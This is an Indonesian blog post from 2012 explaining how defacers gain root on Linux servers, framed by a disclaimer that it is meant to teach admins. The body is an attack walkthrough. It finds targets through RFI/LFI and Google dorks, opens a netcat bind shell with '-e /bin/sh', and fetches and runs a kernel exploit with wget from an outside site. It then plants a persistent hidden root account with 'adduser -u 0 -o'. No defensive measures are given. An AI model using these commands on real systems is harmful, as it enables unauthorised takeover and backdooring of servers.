Minggu, 17 Juni 2012

Cara Mendapatkan Akses Root Pada Server Linux

Tulisan ini hanya untuk pembelajaran belaka terutama buat pada Admin Server. Dengan mengetahui tekhnik rooting yang dilakukan oleh defacer, diharapkan sang Admin bisa lebih meningkatkan keamanan pada servernya. Cyber4rt tidak bertanggung jawab atas apa yang terjadi setelah membaca tulisan ini!

Linux adalah sebuah sistem yang secure, tapi jangan lupa ini buatan manusia, pasti ada saja kelemahan dari sistem itu, entah karena si Admin yang kurang handal dalam konfigurasi atau memang telah di temukan bugs pada sistem itu. Itulah mengapa Developer Linux membuat versi update untuk memperbaiki bugs - bugs yang terdapat pada sistem itu.

Apa itu root pada Linux ?

Root adalah nama user atau account yang secara default memiliki akses penuh ke semua perintah dan file pada sistem mirip Unix operasi Linux atau lainnya.

Bagaimana tekhnik mendapatkan Root pada server Linux?

Untuk bisa mendapatkan root, langkah pertama yang harus dilakukan adalah mendapatkan user biasa. Ini bisa dilakukan dengan melakukan injection ke sebuah situs, tapi untuk mengetahui situs yang memiliki kelemahan maka biasanya defacer melakukan scanning situs - situs yang terdapat vurnerability di sistemnya. Metode yang digunakan bisa RFI (Remote File Inclussion), LFI (Local File Inclussion) dan masih banyak metode lain.

Q : bagaimana cara scanning-nya???
A : untuk bisa scanning anda bisa melakukan koneksi ke server IRC yang menyediakan bot untuk scanning situs yang memiliki vurnerability atau dengan memanfaatkan Google Dork

Q : kasi tau donk IRC servernya???
A : Googling...zzZzzzzZ

Di sini kita beranggapan bahwa defacer sudah memasuki sistem lewat teknik - teknik yang ada di atas. Sekarang backdoor sudah terpasang di server target dan siap di jalankan oleh netcat dengan perintah berikut:

./nc -lvp 5050  -e /bin/sh

kemudian dari komputer defacer menjalankan Netcat (harus sudah terinstall di komputer) dengan perintah berikut :

./nc -v ip_server_target  5050

Setelah itu defacer mengetik:

uname -a

Maka akan muncul hasilnya kira - kira seperti ini (contoh) :

Linux blackbox 2.6.18-194.8.1.el5.028stab070.2 #1 SMP Tue Jun 18 02:30:59 MSD 2010 x86_64 GNU/Linux

Bagian yang perlu diperhatikan adalah 2.6.18-194. Ini adalah versi Kernel dari Linux yang sedang di jalankan. 
Langkah selanjutnya yang akan dilakukan oleh sang defacer adalah mencari bugs pada kernel tersebut  di berbagai situs - situs exploiter/injector. Setiap kernel memiliki bugs tersendiri. Misalnya saja sang defacer telah mendapatkan exploit kernel tersebut, maka dilanjutkan dengan mengetikkan beberapa sintaks-nya sebagai berikut (contoh) :

wget http://www.SitusExploiter.com/2.6.18-194.tgz
tar -xvzf 2.6.18-194.tgz
cd 2.6.18-194
./2.6.18-194.sh

Setelah melakukan beberapa contoh sintaks di atas, maka defacer pastinya ingin mengetahui keberhasilan tekhnik mendapatkan akses root dengan mengetik:

id
atau
whoami

Jika hasilnya root maka anda telah berhasil merebut akses root pada server tersebut. Lihat contoh gambar:

Tekhnik Mendapatkan Root Pada Server Linux

Setelah mendapatkan akses root biasanya defacer menambahkan New User Root Account. Sebagai contoh untuk menambahkan akses root dengan user "Cyber4rt" gunakan perintah berikut:

adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M Cyber4rt

ket:
adduser : perintah dasar Linux untuk menambahkan user

-u 0 -o : set user menjadi dengan ID nol (0) root.

-g 0 : Set initial group dengan ID nol (0) root.

-G 0,1,2,3,4,6,10 : Set additional group ke:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M : "home directory" tidak di create ke user.

Cyber4rt - User name of the new user account.

Untuk melakukan set password pada user yang telah kita buat, perintahnya :

passwd NamaUser

Demikian sedikit teknik yang dapat dilakukan untuk mendapatkan akses Root pada server Linux. Semoga bermanfaat bagi kita semua khususnya para Admin Server.

Ditulis Oleh : Wahyu Aji // 12.49
Kategori:

0 komentar:

Posting Komentar